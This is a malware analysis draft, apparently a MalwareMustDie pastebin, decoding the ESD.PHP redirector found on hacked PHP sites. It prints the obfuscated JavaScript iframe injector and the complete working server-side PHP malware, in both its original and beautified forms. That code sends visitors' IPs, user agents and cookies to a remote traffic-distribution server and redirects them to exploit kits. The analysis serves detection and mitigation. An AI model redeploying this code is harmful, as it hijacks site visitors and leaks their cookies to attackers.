
#ESD.PHP REDIRECTOR UNLEASHED | Server Side's Code

MalwareMustDie Oct 5th, 2013 1,076 Never
  1. ###################################################################################
  2. # MalwareMustDie, NPO | Malware Decode Draft | http://malwaremustdie.org
  3. # Subject: ESD.PHP REDIRECTOR UNLEASHED | Server Side's Evil Code
  4. # The Guide for: Decoding, Reversing, Understanding attack steps for Mitigation.
  5. # Source: something like ending w/***/esd.php
  6. # Cracked by: @unixfreaxjp ~]$ date;uname
  7. Sun Oct  6 21:35:57 JST 2013
  8. FreeBSD
  9. ###################################################################################
  10.  
  11. # Note:
  12. I am sorry: I really did try to write this up on the MalwareMustDie blog, but my eyes have not recovered well
  13. (they burned like crazy after I finished this decoding draft), so please forgive me for
  14. sharing only this decode draft with you in this weekend's "crusade".
  15. Thank's for @kafeine for the grabs, to @wopot for PHP codes discussion, and to all MMD folks, you are all rocks.
  16.  
  17. # Words of wise:
  18. Some "people" saying we're in MalwareMustDie (MMD) are dreamin' way to high to believe of internet
  19. free of malware, as per invented.
  20. I'd say, that people have liberty to speak. as I have liberty to believe what I want to believe,
  21. I ain't gonna judge other's thought and will f*ing die trying to achieve what I believe dearly,
  22. & THAT is none of "those people's" business.
  23.  
  24. This work is ONLY for them who believes.. #MalwareMUSTDie!  
  25.  
  26. #========================
  27. # PROLOGUE
  28. #========================
  29.  
  30. ESD.PHP (the file name varies) has been spotted in the wild redirecting
  31. visitors to malicious sites, the decision being made by a remote TDS that the PHP code queries.
  32. Once a web server with PHP support has been compromised, this threat
  33. can be dropped on it regardless of the server's operating system.
  34. It is a legend already, since we first saw this attack in early 2013, yet
  35. many sites are STILL ACTIVE TODAY, funnelling visitors to
  36. Exploit Kit landing pages for further malware infection.
  37.  
  38. #==========================================
  39. # Sample of ESD.PHP Attack, the front end:
  40. #==========================================
  41.  
  42. // The ESD.PHP front end was found in the wild as JavaScript obfuscated like the sample below,
  43. // which was implanted in various hacked sites..
  44.  
// Analyst notes (not part of the sample; `<s c r i p t>` is the defanged `<script>` tag):
//  - `try{window.document.body++}catch(...){dbshre=57;}` followed by `if(dbshre)`: the script only
//    proceeds when the increment throws; where it does not throw, `dbshre` is never defined and the
//    `if` raises a ReferenceError. This appears to act as an anti-emulation gate - confirm in a browser.
//  - `e=eval` is assigned only if `d.innerHTML.a="asd"` does not throw; `e(s)` at the end runs the payload.
//  - `(020==0x10)` is always true (octal 020 == 16), so the loop body runs whenever `window.document` exists.
//  - Decoder: for i in 0..439, s += fromCharCode(asgq[i] - (i%5) + 9). The first bytes decode to
//    "(function () {" and the last to "})();", i.e. an immediately-invoked function: the iframe
//    injector shown deobfuscated below.
<s c r i p t type="text/javascript" language="javascript" > try{window.document.body++}catch(gdsgsdg){dbshre=57;}
if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eva
l;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,11
1,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,1
01,94,33,36,50,5,3,7,5,23,24,25,26,111,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,96,103,38,110,109,9
6,103,39,93,106,100,39,94,109,95,37,104,97,106,34,50,5,3,26,27,23,24,109,40,110,107,113,101,95,41,103,103,10
8,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,110,41,106,108,114,102,96
,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,107,38,108,110,116,99,93,39,98,96,96,95,97,110
,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,111,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,1
05,114,34,50,5,3,26,27,23,24,109,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,2
4,25,26,111,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,3
1,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,109,33,36,32,24,11
6,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,9
1,53,85,33,111,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111
,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,109,33,36,37,89,105,106,96,101,92,60,98,100,99,92,3
3,110,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-440!=0;i++){if((020==0x10)&&window.docum
ent)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</s c r i p t>
  62.  
  63. // After deobfuscation you will find an IFRAME pointing at esd.php, like the two variants below
  64. // (modified and combined in various ways from site to site):
  65.  
// Variant 1. The decoder output wraps this in "(function () { ... })();" - an immediately-invoked
// function; the closing brace of the function and the "})();" are not shown in this transcript.
// It injects a small absolutely-positioned iframe that loads esd.php from the hacked host.
function ()
     {
       var id = '6';
       var kf09 = document.createElement('iframe');
       kf09.src = 'http://fugafuga/esd.php';   // "fugafuga" is presumably the analyst's placeholder for the real host
       kf09.style.position = 'absolute';
       kf09.style.border = '1';
       kf09.style.height = '31px';
       kf09.style.width = '42px';
       kf09.style.left = '500px';
       kf09.style.top = '100px';
       if (!document.getElementById('kf'))
       {
       // hides the horizontal scrollbar - presumably so the off-page frame does not betray itself
       document.write('<style>body{overflow-x:hidden;}</style>');
         document.write('<div id=\'kf\' style="position:absolute; width:80%; height:100%;" ></div>');
         document.getElementById('kf').appendChild(kf09);
       }
  83.  
// Variant 2: same injector, but a 1x1 pixel, borderless iframe parked at the top-left corner,
// i.e. invisible to the visitor. As above, the function's closing brace is missing from the transcript.
function () {
                var k = document.createElement('iframe');
                k.src = 'http://hogehoge/esd.php';   // "hogehoge" is presumably the analyst's placeholder for the real host
                k.style.position = 'absolute';
                k.style.border = '0';
                k.style.height = '1px';
                k.style.width = '1px';
                k.style.left = '1px';
                k.style.top = '1px';
                if (!document.getElementById('k')) {
                document.write('<div id=\'k\'></div>');
                document.getElementById('k').appendChild(k);
        }
  97.  
  98. #==========================================
  99. # ESD.PHP Attack, the server side:
  100. #==========================================
  101.  
  102. It is hard to guess what happens on the server side from the client-side code alone,
  103. since the client-side code was designed not to expose much of the server side's work.
  104. The server-side code is actually a simple, interactive malicious tool that allows the operator to
  105. configure the attack parameters, save that configuration (into the script file itself) and run
  106. the attack.
  107.  
  108. Meanwhile, when the attack runs, the TDS's answer decides whether the visitor gets an
  109. HTTP 302 redirection, a cookie planted as a delay/cushion until the next
  110. visit, or raw content echoed into the page.
  111.  
  112. So in this write-up I will expose the decoded and reversed server-side code of ESD.PHP,
  113. and suggest some points for mitigating the attack.
  114.  
  115. #==========================================
  116. # The below analysis of code explains:
  117. #==========================================
  118.  
  119. 1. Learn the structure of the attack.
  120. 2. Understand the mitigation points.
  121. 3. Show why sharing a #PoC like this matters: it brings the threat down to the
  122.    user's level, for prevention.
  123.  
  124. #=========================================
  125. # ORIGINAL ESD.PHP SERVER SIDE CODE
  126. #=========================================
  127.  
<?$cfg='vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00='; ?>

<? /* NOTE(review): verbatim sample, left unformatted on purpose. Line 1 above is the per-host encrypted config and is the only part the script rewrites (mode=setconfig); this line holds the base64 string table _536298672(), the string_cpt() keystream cipher and all of the logic, and is the stable part worth signaturing. Decoded values are in the beautified and substituted listings below. */ function _536298672($i){$a=Array('a0xRYzhZMmc=','UkRycQ==','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_536298672(0);function string_cpt($String,$Password){$Salt=_536298672(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_536298672(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_536298672(3),sha1($Gamma .$Seq .$Salt));$Gamma.=substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_536298672(4)];if($mode== _536298672(5)AND $c[_536298672(6)]==$_REQUEST[_536298672(7)]){echo _536298672(8) 
.$_REQUEST[_536298672(9)] ._536298672(10) .$c[_536298672(11)] ._536298672(12) .$c[_536298672(13)] ._536298672(14) .$c[_536298672(15)] ._536298672(16) .$c[_536298672(17)] ._536298672(18) .$c[_536298672(19)] ._536298672(20);die();}if($mode== _536298672(21)AND $c[_536298672(22)]==$_REQUEST[_536298672(23)]){$sn=explode(_536298672(24),$_SERVER[_536298672(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i==0){$c[_536298672(26)]=$_POST[_536298672(27)];$c[_536298672(28)]=$_POST[_536298672(29)];$c[_536298672(30)]=$_POST[_536298672(31)];$c[_536298672(32)]=$_POST[_536298672(33)];$c[_536298672(34)]=$_POST[_536298672(35)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>\n";}$fp=fopen($scr,_536298672(36));if(fputs($fp,implode(_536298672(37),$file)))die(_536298672(38));fclose($fp);}if($mode== _536298672(39)AND $c[_536298672(40)]==$_REQUEST[_536298672(41)]){chmod(_536298672(42),$_SERVER[_536298672(43)]);if(unlink($_SERVER[_536298672(44)]))die(_536298672(45));}$dom=explode(_536298672(46),$c[_536298672(47)]);$dom=$dom[2];$dhost=$dom;if($c[_536298672(48)]){$dom=$c[_536298672(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_536298672(50) .$_SERVER[_536298672(51)] .$_SERVER[_536298672(52)]);$t_ref=urlencode($_SERVER[HTTP_REFERER]);$t_ip=urlencode($_SERVER[_536298672(53)]);$t_prox=_536298672(54);if($_SERVER[_536298672(55)]){$t_prox=_536298672(56);}$t_agent=urlencode($_SERVER[_536298672(57)]);foreach($_COOKIE as $c[_536298672(58)]=>$val){$t_cookie=$t_cookie ._536298672(59) .$c[_536298672(60)] ._536298672(61) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_536298672(62)]);}$out=_536298672(63) .$c[_536298672(64)] ._536298672(65) .$t_dom ._536298672(66) .$t_ref ._536298672(67) .$t_ip ._536298672(68) .$t_prox ._536298672(69) .$t_agent ._536298672(70) .$t_cookie ._536298672(71) .$c[_536298672(72)] 
._536298672(73);$out .= _536298672(74) .$dhost ._536298672(75);$out .= _536298672(76);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch.=$str;if($str== _536298672(77)&& empty($he)){$he=_536298672(78);}if($he== _536298672(79)){$goto.=$str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_536298672(80),$ch);if($res){$goto=$c[_536298672(81)];}if($ch[1]== _536298672(82)){}else{$goto=$c[_536298672(83)];}$gotoe=explode(_536298672(84),$goto);If($gotoe[0]== _536298672(85)){header(_536298672(86));header(_536298672(87) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _536298672(88)){$gotoee=explode(_536298672(89),$goto_body);foreach($gotoee as $setcook){$set=explode(_536298672(90),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _536298672(91)){echo $goto_body;} ?>
  131.  
  132. #========================
  133. # BEAUTIFIED CODE
  134. #========================
  135. //----------------------------
  136. // (Note: some of the longer base64 strings were truncated while preparing this; just read through it)
  137. //----------------------------
  138.  
// Line 1 of the original esd.php: the serialized config array, XOR-encrypted with string_cpt()
// and base64-encoded. mode=setconfig rewrites exactly this line, so it differs from host to host
// while the rest of the script stays constant.
$cfg = 'vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00=';
  140.  
// String table of the obfuscated script. Every literal (config keys, superglobal names, HTML,
// HTTP fragments) is stored base64-encoded and fetched by index; the rest of the code never
// contains a readable string. The table does not change between hosts (only line 1 does), so
// it is a better signature than a hash of the whole file.
// Decoded values are in the trailing comments; "\r\n" and "\n" are written escaped.
function _536298672($i)
  {
    $a = Array(
        'a0xRYzhZMmc=',      // [0]  kLQc8Y2g   - the cipher key, hard-coded
        'UkRycQ==',          // [1]  RDrq       - the cipher salt
        '',                  // [2]  (empty)    - initial keystream
        'SCo=',              // [3]  H*         - pack() format: hex -> raw bytes
        'bW9kZQ==',          // [4]  mode
        'Y29uZmln',          // [5]  config
        'a2V5',              // [6]  key
        'a2V5',              // [7]  key
        'PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9',   // [8]  <form name="form1" method="post" action=?mode=setconfig&key=
        'a2V5',              // [9]  key
        'PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i',           // [10] ><pre>\nTDS:     <input type="text" name="ptds" value="
        'dXJs',              // [11] url
        'Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=',           // [12] ">  TDS IP:  <input type="text" name="ptdsip" value="
        'aXA=',              // [13] ip
        'Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=',               // [14] ">\nKEY:     <input type="text" name="pkey" value="
        'a2V5',              // [15] key
        'Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=',               // [16] ">  Reserve: <input type="text" name="pto" value="
        'bGlu',              // [17] lin
        'Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==',           // [18] ">\nID:      <input type="text" name="pesdid" value="
        'aWQ=',              // [19] id
        'Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==',   // [20] ">  <input type="submit" name="Submit" value="ok"></pre>\n</form>
        'c2V0Y29uZmln',      // [21] setconfig
        'a2V5',              // [22] key
        'a2V5',              // [23] key
        'Lw==',              // [24] /
        'U0NSSVBUX05BTUU=',  // [25] SCRIPT_NAME
        'dXJs',              // [26] url
        'cHRkcw==',          // [27] ptds
        'aXA=',              // [28] ip
        'cHRkc2lw',          // [29] ptdsip
        'bGlu',              // [30] lin
        'cHRv',              // [31] pto
        'aWQ=',              // [32] id
        'cGVzZGlk',          // [33] pesdid
        'a2V5',              // [34] key
        'cGtleQ==',          // [35] pkey
        'dw==',              // [36] w          - fopen() mode
        '',                  // [37] (empty)    - implode() glue
        'U2F2ZWQuCg==',      // [38] Saved.\n
        'a2lsbA==',          // [39] kill
        'a2V5',              // [40] key
        'a2V5',              // [41] key
        'Nzc3',              // [42] 777
        'U0NSSVBUX0ZJTEVOQU1F',   // [43] SCRIPT_FILENAME
        'U0NSSVBUX0ZJTEVOQU1F',   // [44] SCRIPT_FILENAME
        'b2sK',              // [45] ok\n
        'Lw==',              // [46] /
        'dXJs',              // [47] url
        'aXA=',              // [48] ip
        'aXA=',              // [49] ip
        'aHR0cDovLw==',      // [50] http://
        'SFRUUF9IT1NU',      // [51] HTTP_HOST
        'U0NSSVBUX05BTUU=',  // [52] SCRIPT_NAME
        'UkVNT1RFX0FERFI=',  // [53] REMOTE_ADDR
        'bm8=',              // [54] no
        'SFRUUF9YX0ZPUldBUkRFRF9GT1I=',   // [55] HTTP_X_FORWARDED_FOR
        'eWVz',              // [56] yes
        'SFRUUF9VU0VSX0FHRU5U',   // [57] HTTP_USER_AGENT
        'a2V5',              // [58] key
        'Jg==',              // [59] &
        'a2V5',              // [60] key
        'PQ==',              // [61] =
        'UVVFUllfU1RSSU5H',  // [62] QUERY_STRING
        'R0VUIA==',          // [63] "GET " (trailing space)
        'dXJs',              // [64] url
        'P2RvbT0=',          // [65] ?dom=
        'JnJlZj0=',          // [66] &ref=
        'JmlwPQ==',          // [67] &ip=
        'JnByb3g9',          // [68] &prox=
        'JmFnZW50PQ==',      // [69] &agent=
        'JmNvb2tpZT0=',      // [70] &cookie=
        'JmVzZGlkPQ==',      // [71] &esdid=
        'aWQ=',              // [72] id
        'IEhUVFAvMS4wDQo=',  // [73] " HTTP/1.0\r\n"
        'SG9zdDog',          // [74] "Host: "
        'DQo=',              // [75] \r\n
        'Q29ubmVjdGlvbjogQ2xvc2UNCg0K',   // [76] "Connection: Close\r\n\r\n"
        'DQo=',              // [77] \r\n       - end-of-headers marker
        'ZG8=',              // [78] do
        'ZG8=',              // [79] do
        'IA==',              // [80] " " (space)
        'bGlu',              // [81] lin
        'MjAw',              // [82] 200
        'bGlu',              // [83] lin
        'Oi8v',              // [84] ://
        'aHR0cA==',          // [85] http
        'SFRUUC8xLjEgMzAyIEZvdW5k',   // [86] HTTP/1.1 302 Found
        'TG9jYXRpb246IA==',  // [87] "Location: " (trailing space)
        'Y29vaw==',          // [88] cook
        'Jg==',              // [89] &
        'PQ==',              // [90] =
        'ZWNobw=='           // [91] echo
    );
    return base64_decode($a[$i]);
  }
  239.  
error_reporting(0);        // hides every notice/warning the sloppy code below would emit (e.g. the misused chmod() in 'kill')
$key = _536298672(0);      // 'kLQc8Y2g' - the cipher key ships inside the script, so $cfg is recoverable by anyone holding the file
// Keystream cipher protecting $cfg. A SHA-1 chain seeded with $Password and a fixed salt
// yields 8 bytes per round until it covers the input, which is then XORed with it. The same
// call decrypts (XOR is its own inverse). Because key, salt and this routine all live in the
// file, the configuration can be decrypted from the script alone.
function string_cpt($String, $Password)
  {
    $Salt   = _536298672(1);     // 'RDrq'
    $StrLen = strlen($String);
    $Seq    = $Password;
    $Gamma  = _536298672(2);     // '' - keystream accumulator
    while (strlen($Gamma) < $StrLen)
      {
        $Seq = pack(_536298672(3), sha1($Gamma . $Seq . $Salt));   // 'H*': raw 20-byte digest
        $Gamma .= substr($Seq, 0, 8);                               // keep 8 bytes per round
      }
    return $String ^ $Gamma;     // string XOR truncates to the shorter operand: result has strlen($String)
  }
  255.  
// Decrypt the serialized config from line 1: keys 'url' (TDS), 'ip' (TDS IP), 'key', 'lin' (reserve), 'id'
$c    = unserialize(string_cpt(base64_decode($cfg), $key));
$mode = $_REQUEST[_536298672(4)];     // 'mode' - from GET, POST or cookie

// ---- operator mode 'config': print the settings form. All three operator modes are gated on
// ---- ?key= matching $c['key'] (loose == compare). A request carrying mode=config|setconfig|kill
// ---- together with key= is the cheapest server-side detection signature for this family.
if ($mode == _536298672(5) AND $c[_536298672(6)] == $_REQUEST[_536298672(7)])     // 'config', 'key', 'key'
  {
    // (8) '<form ... action=?mode=setconfig&key=' . $_REQUEST['key'] (9) . (10) '><pre>TDS: <input name="ptds" value="'
    // . $c['url'] (11) . (12) '"> TDS IP: <input name="ptdsip" value="' . $c['ip'] (13) . (14) '">KEY: <input name="pkey" value="'
    // . $c['key'] (15) . (16) '"> Reserve: <input name="pto" value="' . $c['lin'] (17) . (18) '">ID: <input name="pesdid" value="'
    // . $c['id'] (19) . (20) '"> <input type="submit" ...></pre></form>'
    echo _536298672(8) . $_REQUEST[_536298672(9)] . _536298672(10) . $c[_536298672(11)] . _536298672(12) . $c[_536298672(13)] . _536298672(14) . $c[_536298672(15)] . _536298672(16) . $c[_536298672(17)] . _536298672(18) . $c[_536298672(19)] . _536298672(20);
    die();
  }

// ---- operator mode 'setconfig': re-encrypt the POSTed values and overwrite THIS FILE's first line.
// ---- The script is self-modifying, so a hash of the whole file is not a stable indicator.
if ($mode == _536298672(21) AND $c[_536298672(22)] == $_REQUEST[_536298672(23)])   // 'setconfig', 'key', 'key'
  {
    $sn = explode(_536298672(24), $_SERVER[_536298672(25)]);     // '/', 'SCRIPT_NAME'
    foreach ($sn as $snn)
      {
        $scr = $snn;                                              // ends up as the basename, opened relative to the cwd
      }
    $getlpa = file($scr);
    $strng  = $getlpa[0];                                         // read but never used
    $file   = file($scr);
    for ($i = 0; $i < sizeof($file); $i++)
        if ($i == 0)
          {
            $c[_536298672(26)] = $_POST[_536298672(27)];          // 'url'  <- ptds
            $c[_536298672(28)] = $_POST[_536298672(29)];          // 'ip'   <- ptdsip
            $c[_536298672(30)] = $_POST[_536298672(31)];          // 'lin'  <- pto
            $c[_536298672(32)] = $_POST[_536298672(33)];          // 'id'   <- pesdid
            $c[_536298672(34)] = $_POST[_536298672(35)];          // 'key'  <- pkey
            $cfg               = base64_encode(string_cpt(serialize($c), $key));
            $file[$i]          = "<?\$cfg='$cfg'; ?>\n";          // only line 1 is replaced
          }
    $fp = fopen($scr, _536298672(36));                            // 'w'
    if (fputs($fp, implode(_536298672(37), $file)))               // ''
        die(_536298672(38));                                      // "Saved.\n"
    fclose($fp);
  }
// ---- operator mode 'kill': delete the script. chmod()'s arguments are reversed relative to
// ---- PHP's chmod($filename, $mode), so that call fails silently; unlink() still works wherever
// ---- the web server user can write the file.
if ($mode == _536298672(39) AND $c[_536298672(40)] == $_REQUEST[_536298672(41)])   // 'kill', 'key', 'key'
  {
    chmod(_536298672(42), $_SERVER[_536298672(43)]);              // chmod('777', SCRIPT_FILENAME)
    if (unlink($_SERVER[_536298672(44)]))                         // 'SCRIPT_FILENAME'
        die(_536298672(45));                                      // "ok\n"
  }

// ---- victim path: ask the TDS what to do with this visitor ----
$dom   = explode(_536298672(46), $c[_536298672(47)]);             // '/', 'url'
$dom   = $dom[2];                                                 // host part of the TDS URL
$dhost = $dom;                                                    // kept for the Host: header
if ($c[_536298672(48)])                                           // 'ip'
  {
    $dom = $c[_536298672(49)];                                    // connect to the raw IP instead of resolving the host
  }
$fp = fsockopen($dom, 80, $errno, $errstr, 2);                    // plain HTTP, 2-second connect timeout
if (!$fp)
  {
    $res = 1;                                                     // TDS unreachable -> reserve URL below
  }
else
  {
    // Visitor profile sent to the TDS: the compromised page URL, referer, client IP, whether an
    // X-Forwarded-For header was present, User-Agent and every cookie the browser holds for the
    // compromised domain (or the query string when there are none). Cleartext, on port 80.
    $t_dom  = urlencode(_536298672(50) . $_SERVER[_536298672(51)] . $_SERVER[_536298672(52)]);   // 'http://' . HTTP_HOST . SCRIPT_NAME
    $t_ref  = urlencode($_SERVER[HTTP_REFERER]);                  // bare constant; resolves to the string 'HTTP_REFERER' (notice suppressed)
    $t_ip   = urlencode($_SERVER[_536298672(53)]);                // 'REMOTE_ADDR'
    $t_prox = _536298672(54);                                     // 'no'
    if ($_SERVER[_536298672(55)])                                 // 'HTTP_X_FORWARDED_FOR'
      {
        $t_prox = _536298672(56);                                 // 'yes'
      }
    $t_agent = urlencode($_SERVER[_536298672(57)]);               // 'HTTP_USER_AGENT'
    // Sloppy original: the loop key is $c['key'] itself, so the stored key is clobbered with the
    // last cookie name. Nothing after this point reads $c['key'] again.
    foreach ($_COOKIE as $c[_536298672(58)] => $val)              // 'key'
      {
        $t_cookie = $t_cookie . _536298672(59) . $c[_536298672(60)] . _536298672(61) . $val;   // '&' . name . '=' . value
      }
    $t_cookie = urlencode($t_cookie);
    if (empty($t_cookie))
      {
        $t_cookie = urlencode($_SERVER[_536298672(62)]);          // 'QUERY_STRING'
      }
    // Raw HTTP/1.0 request: "GET <url>?dom=..&ref=..&ip=..&prox=..&agent=..&cookie=..&esdid=<id> HTTP/1.0\r\n"
    // - that query-string layout is the network signature of an infected host talking to its TDS.
    $out = _536298672(63) . $c[_536298672(64)] . _536298672(65) . $t_dom . _536298672(66) . $t_ref . _536298672(67) . $t_ip . _536298672(68) . $t_prox . _536298672(69) . $t_agent . _536298672(70) . $t_cookie . _536298672(71) . $c[_536298672(72)] . _536298672(73);
    $out .= _536298672(74) . $dhost . _536298672(75);             // "Host: " . host . "\r\n"
    $out .= _536298672(76);                                       // "Connection: Close\r\n\r\n"
    fwrite($fp, $out);
    while (!feof($fp))
      {
        $str = fgets($fp, 128);
        $ch .= $str;                                              // whole response; only the status line is used later
        if ($str == _536298672(77) && empty($he))                 // "\r\n" = end of headers
          {
            $he = _536298672(78);                                 // 'do'
          }
        if ($he == _536298672(79))                                // 'do'
          {
            $goto .= $str;                                        // body, starting with the blank line itself
          }
      }
    fclose($fp);
  }
$goto = substr($goto, 2);                                         // drop that leading "\r\n"
$ch   = explode(_536298672(80), $ch);                             // ' ' -> $ch[1] is the status code
if ($res)
  {
    $goto = $c[_536298672(81)];                                   // 'lin' (reserve URL) when the TDS was unreachable
  }
if ($ch[1] == _536298672(82))                                     // '200'
  {
  }
else
  {
    $goto = $c[_536298672(83)];                                   // 'lin' again when the TDS did not answer 200
  }
// The scheme prefix of the body selects the action:
//   http://...      -> 302 the visitor there
//   cook://a=b&c=d  -> set cookies (the "cushion" until the next visit), no redirect
//   echo://...      -> write the rest of the body straight into the response
$gotoe = explode(_536298672(84), $goto);                          // '://'
If ($gotoe[0] == _536298672(85))                                  // 'http'
  {
    header(_536298672(86));                                       // 'HTTP/1.1 302 Found'
    header(_536298672(87) . $goto);                               // 'Location: ' . $goto
  }
$goto_body = substr($goto, 7);                                    // strip the 7-byte "xxxx://" prefix
If ($gotoe[0] == _536298672(88))                                  // 'cook'
  {
    $gotoee = explode(_536298672(89), $goto_body);                // '&'
    foreach ($gotoee as $setcook)
      {
        $set = explode(_536298672(90), $setcook);                 // '='
        setcookie($set[0], $set[1]);
      }
  }
If ($gotoe[0] == _536298672(91))                                  // 'echo'
  {
    echo $goto_body;
  }
  381.  
  382. #========================
  383. # CRACKING TABLE
  384. #========================
  385. // What we are going to do is decode the base64 array at the top into plain strings,
  386. // as a lookup table whose values get substituted back into the code...
  387. -------------------------------------------------------------------------
  388. base64                                 Strings
  389. -------------------------------------------------------------------------
  390. a0xRYzhZMmc=                           kLQc8Y2g
  391. UkRycQ==                               RDrq
  392. (empty string)                         (empty string)
  393. SCo=                                   H*
  394. bW9kZQ==                               mode
  395. Y29uZmln                               config
  396. a2V5                                   key
  397. a2V5                                   key
  398. PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZ      <form name="form1" metho[...]
  399. a2V5                                   key
  400. PjxwcmU+ClREUzogICAgIDxpbnB1dCB0e      ><pre>TDS:     <input t[...]
  401. dXJs                                   url
  402. Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlP      ">  TDS IP:  <input type[...]
  403. aXA=                                   ip
